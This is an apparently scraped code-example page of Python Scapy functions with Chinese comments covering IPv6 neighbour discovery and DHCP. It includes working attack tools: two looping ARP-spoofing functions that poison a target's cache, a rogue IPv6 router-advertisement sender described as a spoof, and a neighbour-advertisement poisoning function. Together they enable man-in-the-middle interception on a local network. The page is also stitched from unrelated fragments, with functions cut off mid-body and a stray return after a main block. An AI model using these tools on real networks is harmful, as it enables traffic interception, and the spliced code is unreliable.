def icmpv6_rs(ifname):
    ll_mac = get_mac_address(ifname)  # 获取本机接口MAC地址
    # -----------IPv6头部------------
    # Next Header: 0x3A (ICMPv6)
    # 原地址: Link Local address
    # 目的地址: FF02::2(所有路由器)

    # 可以省略 src=mac_to_ipv6_linklocal(ll_mac) 来提高效率
    base = IPv6(src=mac_to_ipv6_linklocal(ll_mac), dst='ff02::2')
    # ----------ICMPv6头部----------
    # ICMPv6 Type: 133
    # ICMPv6 Code: 0 (RS)
    router_solicitation = ICMPv6ND_RS()
    # ----Source Link-Layer Address----
    # 源地址: 00:50:56:AB:25:08(本地MAC地址)
    src_ll_addr = ICMPv6NDOptSrcLLAddr(lladdr=ll_mac)
    # 构建数据包
    # packet = base / router_solicitation / src_ll_addr

    # 最简单的构建方案
    packet = IPv6() / ICMPv6ND_RS()

    # packet.show()
    # 发送数据包,接受返回数据包
    result = sr1(packet, timeout=2, verbose=False)
    # result.show()
    # 提取返回数据包中的网关MAC
    print("gwmac: ", result.getlayer("ICMPv6 Neighbor Discovery Option - Source Link-Layer Address").fields['lladdr'])
    # 提取返回数据包中的MTU
    print("mtu: ", result.getlayer("ICMPv6 Neighbor Discovery Option - MTU").fields['mtu'])
    # 提取返回数据包中的Prefix信息
    print("prefix: ", result.getlayer("ICMPv6 Neighbor Discovery Option - Prefix Information").fields['prefix'])
Beispiel #2
0
def icmpv6_ra(ifname):
    # 提取本地MAC
    ll_mac = get_mac_address(ifname)
    # -----------IPv6头部------------
    # Next Header: 0x3A (ICMPv6)
    # 原地址: Link Local address
    # 目的地址: FF02::1(所有节点)

    # 可以省略mac_to_ipv6_linklocal(ll_mac) 来提高效率
    base = IPv6(src=mac_to_ipv6_linklocal(ll_mac), dst='ff02::1')
    # ----------ICMPv6头部----------
    # ICMPv6 Type: 134
    # ICMPv6 Code: 0 (RA)
    router_solicitation = ICMPv6ND_RA()
    # ----Source Link-Layer Address----
    # 源地址: 00:50:56:AB:4D:19(路由器MAC地址),本次为欺骗,所以MAC地址是本地MAC地址
    src_ll_addr = ICMPv6NDOptSrcLLAddr(lladdr=ll_mac)
    # 提供MTU
    mtu = ICMPv6NDOptMTU(mtu=1500)
    # 提供前缀
    prefix = ICMPv6NDOptPrefixInfo(prefix='2001:2::', prefixlen=64)
    # 构建数据包
    packet = base / router_solicitation / src_ll_addr / mtu / prefix

    # packet.show()
    # 一直发送,知道客户使用Ctrl + C终止
    while True:
        try:
            time.sleep(1)
            send(packet, verbose=False)
            print('发送RA数据包')
        except KeyboardInterrupt:
            print('退出!')
def arp_spoof(ip_1, ip_2, ifname='Net1'):
    global localip, localmac, ip_1_mac, ip_2_mac, g_ip_1, g_ip_2, g_ifname  # 申明全局变量
    g_ip_1 = ip_1  # 为全局变量赋值,g_ip_1为被毒化ARP设备的IP地址
    g_ip_2 = ip_2  # 为全局变量赋值,g_ip_2为本机伪装设备的IP地址
    g_ifname = ifname  # 为全局变量赋值,攻击使用的接口名字

    # 获取本机IP地址,并且赋值到全局变量localip
    localip = get_ip_address(ifname)
    # 获取本机MAC地址,并且赋值到全局变量localmac
    localmac = get_mac_address(ifname)
    # 获取ip_1的真实MAC地址
    ip_1_mac = arp_request(ip_1, ifname)[1]
    # 获取ip_2的真实MAC地址
    ip_2_mac = arp_request(ip_2, ifname)[1]
    # 引入信号处理机制,如果出现ctl+c(signal.SIGINT),使用sigint_handler这个方法进行处理
    signal.signal(signal.SIGINT, sigint_handler)
    while True:  # 一直攻击,直到ctl+c出现!!!
        # op=2,响应ARP
        sendp(Ether(src=localmac, dst=ip_1_mac) / ARP(
            op=2, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1),
              iface=scapy_iface(g_ifname),
              verbose=False)
        # op=1,请求ARP
        # sendp(Ether(src=localmac, dst=ip_1_mac)/ARP(op=1, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1),
        # iface = g_ifname, verbose = False)
        # 以太网头部的src MAC地址与ARP数据部分的hwsrc MAC不匹配攻击效果相同
        # sendp(Ether(src=ip_1_mac, dst=ip_1_mac)/ARP(op=1, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1),
        # iface = g_ifname, verbose = False)
        # 如果采用dst为二层广播,会造成被伪装设备告警地址重叠,并且欺骗效果不稳定,容易抖动!
        print("发送ARP欺骗数据包!欺骗" + ip_1 + ',本机MAC地址为' + ip_2 + '的MAC地址!!!')
        time.sleep(1)
Beispiel #4
0
def icmpv6_na(spoof_host, masquerade_host, ifname):  # 发送NA主要用于毒化
    ll_mac = get_mac_address(ifname)  # 获取本机接口MAC地址
    # ----------以太网头部 - ---------
    # 以太网协议号: 0x86DD(IPv6)
    # 源目MAC为两个节点的单播地址
    # 源为系统本地MAC,Scapy自动产生,目标MAC为被欺骗主机MAC,使用NS获取
    dst_mac = icmpv6_ns(spoof_host, ifname)
    ether = Ether(dst=dst_mac)

    # -----------IPv6头部------------
    # Next Header: 0x3A (ICMPv6)
    # 原地址: 2001:1::200 伪装地址
    # 目的地址: 2001:1::253的Link Local Address,欺骗主机的Link Local Address
    ipv6 = IPv6(src=masquerade_host, dst=mac_to_ipv6_linklocal(dst_mac))
    # R=1 Sender is a router,
    # S=1 advertisement is sent in response to a Neighbor Solicit,
    # O=1 override flag
    # 目标地址: 2001:1::200 伪装地址
    neighbor_advertisements = ICMPv6ND_NA(
        tgt=masquerade_host,
        R=0,  # 我不是路由器
        S=0,  # 我不是一个NS的响应
        O=1)  # 我要覆盖

    # ----Target Link-Layer Address----
    # 源地址: 本地MAC地址
    src_ll_addr = ICMPv6NDOptDstLLAddr(lladdr=ll_mac)
    # 构建完整数据包
    packet = ether / ipv6 / neighbor_advertisements / src_ll_addr
    # 发送数据包
    sendp(packet, verbose=False)
def icmpv6_ns(host, ifname):  # 请求特定IPv6地址的MAC地址
    ll_mac = get_mac_address(ifname)  # 获取本机接口MAC地址
    # 构建icmpv6_ns数据包

    # -----------IPv6头部 - -----------
    # Next Header: 0x3A(ICMPv6)
    # 原地址: Link Local address
    # 目的地址: Solicited node multicast address # 请求节点组播地址
    #
    # ----------ICMPv6头部 - ---------
    # ICMPv6 Type: 135
    # ICMPv6 Code: 0(NS)
    # 目标地址: 2001:1::253
    #
    # ----Source Link-Layer Address - ---
    # 源地址: 00:50:56:AB:25:08(本地MAC地址)

    # 所有可选都填写
    # packet = IPv6(src=mac_to_ipv6_linklocal(ll_mac),
    #               dst=solicited_node_multicast_address(host)) / ICMPv6ND_NS(tgt=host) / ICMPv6NDOptSrcLLAddr(lladdr=ll_mac)

    # 下面是最精简
    # 系统自动产生, IPv6头部(linklocal地址, 请求节点组播地址(并且转换到组播MAC))
    # 没有ICMPv6NDOptSrcLLAddr头部一样正常工作
    packet = IPv6() / ICMPv6ND_NS(tgt=host)
    # packet.show()

    # 发送数据包
    result = sr1(packet, timeout=2, verbose=False)

    # 提取返回的MAC地址
    # result.show()
    return result.getlayer(
        "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
    ).fields['lladdr']
Beispiel #6
0
def arp_spoof(ip_1, ip_2, ifname='ZlineNET1'):
    global localip, localmac, ip_1_mac, ip_2_mac, g_ip_1, g_ip_2, g_ifname  #
    g_ip_1 = ip_1  #被毒化arp设备的ip设备
    g_ip_2 = ip_2  #本机伪装设备的ip
    g_ifname = ifname  #攻击使用的接口
    #获取本机ip和mac
    localip = get_ip_address(ifname)
    localmac = get_mac_address(ifname)
    #获取被攻击的目标的mac
    ip_1_mac = arp_request(ip_1, ifname)[1]
    #获取伪装设备的mac
    signal.signal(signal.SIGINT, sigint_handler)
    while True:
        sendp(Ether(src=localmac, dst=ip_1_mac) / ARP(
            op=2, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1),
              iface=g_ifname,
              verbose=False)
        print('发送ARP欺骗数据包!欺骗' + ip_1 + ',本机MAC地址为' + ip_2 + '的MAC地址!!!!')
        time.sleep(1)
                    print('%-15s ==> %s' % (str(option[0]), str(option[1])))
        elif pkt.getlayer(DHCP).fields['options'][0][1] == 5:  # 发现并且打印DHCP ACK
            print('发现DHCP ACK包,确认的IP为:' + pkt.getlayer(BOOTP).fields['yiaddr'])
            print('ACK包中发现如下Options:')
            for option in pkt.getlayer(DHCP).fields['options']:
                if option == 'end':
                    break
                # 打印DHCP ACK的所有选项
                print('%-15s ==> %s' % (str(option[0]), str(option[1])))
    except Exception as e:
        print(e)
        pass


def dhcp_full(ifname, mac_address, timeout=3):
    global global_if
    global_if = ifname
    # 发送DHCP Discover数据包
    pool.apply_async(dhcp_discover_sendonly, args=(global_if, mac_address))
    # 侦听数据包,使用过滤器filter="port 68 and port 67"进行过滤,把捕获的数据包发送给DHCP_Monitor_Control函数进行处理
    sniff(prn=dhcp_monitor_control,
          filter="port 68 and port 67",
          store=0,
          iface=scapy_iface(global_if),
          timeout=timeout)


if __name__ == '__main__':
    # 使用Linux解释器 & WIN解释器
    dhcp_full('Net1', get_mac_address('Net1'))
    # MAC地址只有6个字节,所以需要把剩余部分填充b'\x00'
    return info + b'\x00' * (16 - len(info))


def dhcp_discover_sendonly(ifname, mac_address, wait_time=1):
    bytes_mac = change_mac_to_bytes(mac_address)  # 把MAC地址转换为二进制格式
    # param_req_list为请求的参数,没有这个部分服务器只会回送IP地址,什么参数都不给
    discover = Ether(dst='ff:ff:ff:ff:ff:ff',
                     src=mac_address,
                     type=0x0800) / IP(src='0.0.0.0',
                                       dst='255.255.255.255') \
                                  / UDP(dport=67,
                                        sport=68) \
                                  / BOOTP(op=1,
                                          chaddr=chaddr(bytes_mac)) \
                                  / DHCP(options=[('message-type', 'discover'),
                                                  ('param_req_list', bytes_requested_options),
                                                  'end'])

    if wait_time != 0:
        time.sleep(wait_time)
        sendp(discover, iface=scapy_iface(ifname), verbose=False)
    else:
        sendp(discover, iface=scapy_iface(ifname), verbose=False)


if __name__ == '__main__':
    # 使用Linux解释器 & WIN解释器
    local_mac = get_mac_address('Net1')
    dhcp_discover_sendonly('Net1', local_mac)